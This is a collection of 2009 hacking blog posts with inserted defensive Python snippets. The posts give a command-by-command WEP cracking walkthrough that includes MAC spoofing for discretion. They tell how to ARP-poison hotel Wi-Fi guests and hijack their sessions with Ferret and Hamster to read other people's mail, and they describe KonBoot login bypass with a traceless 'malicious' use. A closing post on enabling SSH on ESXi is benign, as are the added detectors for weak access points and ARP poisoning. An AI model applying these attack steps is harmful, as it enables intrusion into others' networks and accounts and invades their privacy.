WEP Cracking

Tuesday, June 30, 2009 by BBTUNA

The first thing we are going to do is install BackTrack 3 or 4 onto an SD card, flash drive or CD/DVD so we can boot from it without having to mess up the currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet.

After you have booted into BackTrack, we are ready for the fun part. The first thing we will do is shut down our wifi card (your interface name may be different, e.g. ath0 or rausb0). In the terminal:

ifconfig wlan0 down

Next we want to change the MAC address of your wireless card to make things easier later and help you be more discreet:

macchanger --mac 00:11:22:33:44:55 wlan0

Next we want to bring it back up, but in monitor mode (this enables the card to capture packets without associating with the access point):

airmon-ng start wlan0

You should see that a new interface called mon0 was created. That is the interface we are going to use for the rest of our cracking. Next:

airodump-ng mon0

This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write them down, just open a new shell and leave that one open.

Now press

ctrl+c

to stop airodump-ng.

Open a new console (if you haven’t already) and type:

airodump-ng --channel x --bssid y -w filename mon0

Where x and y are the channel and BSSID that you wrote down, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I'm searching through my cracked WEP files I know what's what.

Now leave that running and open another shell and type:

aireplay-ng --arpreplay -b [Access Point's MAC] -h 00:11:22:33:44:55 mon0

Now leave that running and open yet another shell, and type:

aireplay-ng --deauth 5 -c 00:11:22:33:44:55 -a [Access Point's MAC] mon0

Now in that same window type:

aircrack-ng filename*.cap

Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arise.
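From the defender's side, the same airodump-ng capture (the CSV file written alongside the .cap when you pass -w) doubles as an inventory of which access points on your site still run WEP or no encryption and need moving to WPA2. The script below is an added example, not code from the post; the CSV column layout is assumed from memory of the tool's output, and the rows are constructed.

```python
import csv
import io

# Constructed sample in the airodump-ng CSV layout (column names are an
# assumption about the tool's output, not taken from the post).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2009-06-30 21:00:01, 2009-06-30 21:09:47,  6,  54, WEP , WEP, OPN, -45,  312,  48211,   0.  0.  0.  0,   9, OldRouter, 
00:1D:7E:AA:BB:CC, 2009-06-30 21:00:02, 2009-06-30 21:09:45, 11,  54, WPA2, CCMP, PSK, -61,  298,      0,   0.  0.  0.  0,   7, HomeNet, 
00:0F:B5:11:22:33, 2009-06-30 21:00:05, 2009-06-30 21:09:40,  1,  11, OPN ,     ,    , -70,  150,      0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2009-06-30 21:01:00, 2009-06-30 21:09:47, -50,  5000, 00:14:6C:7E:40:80, 
"""


def parse_access_points(text):
    """Return the access-point table (the first block) as a list of dicts."""
    lines = text.splitlines()
    try:
        start = next(i for i, l in enumerate(lines) if l.startswith("BSSID,"))
    except StopIteration:
        return []
    block = []
    for line in lines[start:]:
        if not line.strip():          # the AP table ends at the first blank line
            break
        block.append(line)
    reader = csv.DictReader(io.StringIO("\n".join(block)), skipinitialspace=True)
    rows = []
    for row in reader:
        # Strip the padding airodump-ng puts around every cell.
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows


def weak_access_points(text):
    """(BSSID, ESSID, privacy, IV count) for networks still on WEP or open."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap.get("Privacy", "")
        if privacy.startswith("WEP") or privacy == "OPN":
            findings.append((ap["BSSID"], ap["ESSID"], privacy, int(ap["# IV"] or 0)))
    return findings
```

A high "# IV" count on a WEP network is traffic an attacker could collect; the fix is to migrate that AP to WPA2, not to hide it.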


Cain and Abel are with a Ferret and a Hamster

Friday, June 26, 2009 by BBTUNA
Well here we go again being curious..... Here is the scenario, I am in a hotel room that has free Wifi (wireless for all those that are not in the know) on a laptop that's running Windows XP (no Linux required for this one) and decide that nothing good can come from this. So I decide well I don't want to give out my MAC address but I'll use somebody else's. Why not? I scan the network using Zenmap because I'm using Windows XP; I'm going with the GUI. After getting a MAC address that I like, oh 11:22:33:44:55 sounds good, I then change my MAC address using the MAC address changer (located online for free). Once that is ready I connect to the Internet, accept the agreement from the hotel room, and then receive an IP from the hotel. I'm in!

Now for the fun part. I fire up my Cain and Abel program and get to sniffing the network. Once you have picked up all targets, it's time to perform an ARP cache poison. You should now have a "man in the middle" established. Here is where the Ferret and the Hamster come into play. You start up your Ferret program. Select the interface that you will be using (usually your wireless card) and now Ferret should be receiving all those wonderful cookies. MMMMMM. Let it run for a while so that you may get as many cookies as possible. Now let's fire up Hamster (what this does is clone those cookies into pages). First start up a web browser and change the proxy settings to 127.0.0.1. Using a web interface you can access Hamster and select an IP, and choose a cookie/webpage (like Facebook) and be logged in as the user. Now if you wanted you could read that person's mail. Pretty scary huh. Makes you think you can't even pick your nose behind a laptop without someone recording it from your webcam (too bad it's possible and will be covered in a different segment). AS A DISCLAIMER. You are by no means authorized to read other people's emails or in any way tamper with that person's property. Doing so will result in judicial punishment so be curious at your own risk.

Okay, so how do you protect yourself from such an attack? Well.....the best way to protect yourself from such attacks is to tunnel your traffic. Set up a VPN, log into your home network and surf the web. All of your traffic (cookies especially) will be encrypted and useless to the Hamster. There are a few ways of doing this, like setting up a VPN connection through your router (like OpenVPN); another would be to set up a VPN connection on a desktop/laptop at home to accept the incoming connection from your laptop; and the easiest way would be to download TeamViewer. TeamViewer comes with a built-in VPN connection that allows you to just connect through it to your home computer. Remember that just because it's free internet doesn't mean it's safe. Protect at all times.
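The ARP cache poison described above leaves a footprint a passive monitor on the LAN can spot: the gateway's IP suddenly answers from a different MAC, and one MAC starts claiming several IPs. The detector below is an added example (not from the post); the ARP replies are a constructed sample, and the 00:11:22:33:44:55 address is the spoofed one used in the post.

```python
from collections import defaultdict

# Constructed ARP replies as (time, sender IP, sender MAC), as a passive
# sniffer on the hotel LAN would see them. Not captured from a real network.
ARP_REPLIES = [
    ("21:00:01", "10.0.0.1",  "00:1a:2b:3c:4d:01"),   # real gateway
    ("21:00:02", "10.0.0.23", "00:1a:2b:3c:4d:23"),   # another guest's laptop
    ("21:00:05", "10.0.0.1",  "00:1a:2b:3c:4d:01"),
    ("21:03:10", "10.0.0.1",  "00:11:22:33:44:55"),   # gateway IP answered by a new MAC
    ("21:03:11", "10.0.0.23", "00:11:22:33:44:55"),   # same MAC now also claims the guest's IP
]


def detect_arp_poisoning(replies, trusted=None):
    """Return alerts for IPs whose MAC changes and for MACs claiming several IPs.

    `trusted` pins known IP->MAC pairs (e.g. the gateway) so they are never
    overwritten by a later forged reply; every later mismatch is reported.
    """
    pinned = dict(trusted or {})
    ip_to_mac = dict(pinned)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append((ts, "ip-remapped", ip, known, mac))
        if ip not in pinned:
            ip_to_mac[ip] = mac          # remember the latest mapping for unpinned IPs
        ips = mac_to_ips[mac]
        if ips and ip not in ips:        # this MAC already owns a different IP
            alerts.append((ts, "mac-claims-multiple-ips", mac, sorted(ips | {ip})))
        ips.add(ip)
    return alerts
```

The gateway entry is the one worth pinning: a static ARP entry for it on your own machine, or the VPN the post recommends, is what actually neutralises the attack.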

Bypassing local passwords on Windows

Friday, June 19, 2009 by BBTUNA
Here is the scenario: Joe the Admin just dropped a server from the domain (to change the name, for example) and after the restart he tries to log in only to find out he can't. HMMMMM. Another scenario: grandma just bought a new laptop/PC and for whatever reason (AGE) can't remember her password and needs to change it. There are two ways of getting around this situation; one is using ophcrack with rainbow tables and trying to crack the password, which unless you have a great rainbow table and a strong processor on the PC might take quite a bit to crack.

Now for the best solution: use KonBoot. You still have to burn the ISO to a CD or write it to a USB drive and boot into the image like you would ophcrack, but it's how it works that is pretty amazing. What it does is take the Windows kernel, rewrite it in memory and start up Windows like it normally would. Only this time when you are prompted for a username and password just hit "enter" and that's it, you are in. Here is the catch: you can not change the user's password but you can use the account as if you were the user. It pretty much spoofs the user's credentials and lets you go from there. This has been tested on all Windows versions (XP - 7 & 2000 - 2008).

Now if you wanted to be malicious (ninja style) you could have this on a 1 GB thumb drive and be able to access any PC simply by booting from the USB, and there would be no trace of you ever being there.

Enabling SSH on ESXi 3.5 or 4 (VSphere)

Friday, June 12, 2009 by BBTUNA
I ran into this issue last night as I was trying to transfer over files with WinSCP. First off, if you are familiar with ESXi, you know there is no service console by default and you are given the bare-bones version of ESX unless you purchase the upgrade for ESXi. If you are using this for home use then ESXi (free) is more than enough. Personally I run ESXi 3.5 Update 4 (free) and for firewall issues I just have a VM running pfSense with no problems. If you ever want to transfer over files or VMDKs to a VMFS LUN/disk you need to enable SSH to use WinSCP.

Here is how it's done:
1. At the start up screen (Management Console) press ALT+F1 and a console screen will come up
2. Type unsupported (you will not see the text) and press Enter
3. You'll see "Technical Support Mode" and a prompt for a password; simply type in your root password
4. If everything is successful you will be given a shell "#"
5. Type in vi /etc/inetd.conf
6. The config file will come up on the screen and now just scroll down until you see "#SSH"
7. Press the "Insert" button on your keyboard and remove the # (this will uncomment the SSH service line)
8. Now press "ESC" button and type :wq (this will write and quit your editing session)
9. Now type in ps -a | grep inetd (this will find the process for inetd)
10. You should see the PID for "busybox"/"inetd" (the number will be different for everyone)
11. Type kill (and the PID number from the last step) and this will stop the inetd process
12. Type cd /etc
13. Type ./services.sh restart (this will restart the management services)
14. Now perform a clean reboot of your ESXi machine: press ALT+F2 to get back to the management screen
15. Press F12 to shutdown/restart and restart (wait for your machine to come back up)
16. Now you should be able to log in with SSH (putty) and SCP (WinSCP)
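Steps 5 to 8 above are the hand edit of /etc/inetd.conf. Because enabling SSH adds a listening service to the host, it is worth keeping that edit auditable and reversible: the helper below is an added example (not from the post) that reports which inetd services are enabled and toggles the ssh line idempotently. The sample file content is constructed, and the exact form of ESXi's dropbear line is an assumption.

```python
import re

# Constructed stand-in for the relevant lines of /etc/inetd.conf on ESXi.
# The real file has more services; the ssh/dropbear line here is assumed.
SAMPLE_INETD_CONF = """\
# inetd.conf (constructed sample)
#ssh stream tcp nowait root /sbin/dropbearmulti dropbear ++min=0,swap,group=shell -i -K60
authd stream tcp nowait root /sbin/authd authd
"""

# A service line: optional leading '#', the service name, then stream/dgram.
SERVICE_RE = re.compile(r"^(?P<comment>#?)(?P<name>\w+)\s+(?P<proto>stream|dgram)\s+")


def enabled_services(conf):
    """Names of the services inetd will actually listen for (uncommented lines)."""
    matches = (SERVICE_RE.match(line) for line in conf.splitlines())
    return [m.group("name") for m in matches if m and not m.group("comment")]


def set_service(conf, name, enabled):
    """Return (new_conf, changed); toggles the '#' on the named service line.

    A no-op (changed=False) when the line is already in the requested state
    or the service does not exist, so running it twice is safe.
    """
    out, changed = [], False
    for line in conf.splitlines():
        m = SERVICE_RE.match(line)
        if m and m.group("name") == name:
            is_enabled = not m.group("comment")
            if enabled and not is_enabled:
                line, changed = line[1:], True        # drop the leading '#'
            elif not enabled and is_enabled:
                line, changed = "#" + line, True      # comment it back out
        out.append(line)
    return "\n".join(out) + "\n", changed
```

After the inetd restart in steps 9 to 13, `set_service(conf, "ssh", False)` is the exact reverse of step 7 once the file transfer is done.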